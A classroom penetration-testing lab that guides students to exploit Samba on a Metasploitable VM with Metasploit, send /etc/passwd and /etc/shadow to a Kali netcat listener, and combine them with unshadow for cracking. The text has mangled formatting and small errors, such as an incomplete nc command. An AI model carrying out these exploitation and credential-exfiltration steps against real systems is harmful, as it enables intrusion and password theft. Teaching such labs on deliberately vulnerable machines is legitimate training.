In this Lab, you will be exploiting the Samba implementation on Metasploitable as well as use netcat to exfiltrate data

Ensure that both the Kali and the metasploitable machines are powered on and on the same network. Verify connectivity between them by using the ping command.

Run nmap against the metasploitable machine using the following command

sudo nmap $-$sV $-$vvv $($make a note of open ports and services$)$

make a note of what port is VSFTPD service running

$2.$ On your Kali machine launch the metasploit framework

$3.$ Search for Samba exploits based on version identified in nmap results

msf$6>$ search type:exploit name:samba

$4.$ Select the exploit matching the version $($note that the search option may not provide a lot of information so you will likely have to try multiple exploits to make it work$)$

$5.$ Select the exploit by using command below

use exploit$/$xxxxx

$6.$ Set required options by using set command $($hint RHOSTS, and possibly payload$)$

$7.$ Execute the exploit $($this should open a session on the exploited host$)$

$8.$ Open another Kali terminal window

$9.$ Launch netcat in a listen mode and redirect output to a file as shown

nc $-$l $-$p $4567>$ passwd.txt

$10.$ From the exploited system terminal $($session opened from metasploit exploit you executed$)$ type the following commands to extract the $/$etc$/$passwd

cat $/$etc$/$passwd $|$ nc $4567($there will be no progress bar and there should be no error messages$)$

go back to the listening netcat window and terminate it using CTRL$+$C$.$ Cat the contents of the passwd.txt file using command below

cat passwd.txt

$11.$ Start another netcat command but redirect the contents to shadow.txt instead of passwd.txt $($use the same command as in Step $9$ just change passwd.txt to shadow.txt$)$

$12.$ From the exploited system terminal $($session opened from metasploit exploit you executed$)$ type the following commands to extract t$/$etc$/$shadow file

cat $/$etc$/$shadow$|$ nc $4567($there will be no progress bar and there should be no error messages$)$

go back to the listening netcat window and terminate it using CTRL$+$C$.$ Cat the contents of the passwd.txt file using command below

cat shadow.txt

$13.$ On your kali box combine the contents of passwd.txt and shadow.txt using the command below

unshadow passwd.txt shadow.txt $>$ user$\_$logins$.$txt

$14.$ What is the content of the combined user$\_$logins$.$txt file $($include screen shot$)$